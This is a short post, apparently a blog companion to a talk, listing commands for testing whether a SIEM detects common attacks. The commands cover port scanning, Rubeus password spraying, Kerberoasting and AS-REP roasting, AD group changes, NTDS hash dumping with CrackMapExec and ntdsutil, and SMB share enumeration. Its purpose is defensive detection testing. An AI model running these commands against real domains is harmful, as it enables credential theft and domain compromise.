Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more context, but here are the essential tools and commands covered:
Port scanningnmap 10.0.7.0/24
– basic nmap scanmassscan -p1-65535,U:1-65535 --rate=1000 10.0.7.0/24 -v
– scan all 65k+ TCP and UDP ports!
Password sprayingRubeus.exe spray /password:Winter2022! /outfile:pwned.txt
– try to log into all AD accounts one time with Winter2022! as the password, and save any pwned creds to pwned.txt
Kerberoasting and ASREPRoastingrubeus.exe kerberoast /simple
rubeus asreproast /nowrap
Key group membership changesnet group "GROUP NAME" user-to-add-to-a-group /add
Dump Active Directory hashescme smb IP.OF.THE.DOMAINCONTROLLER -u user -p password --ntds --enabled
ntdsutil "ac i ntds" "ifm" "create full c:\dc-backup" q q
SMB share huntingInvoke-HuntSMBShares -Threads 100 -OutputDirectory C:\output
– SMB enumeration using PowerHuntShares
Share on socials: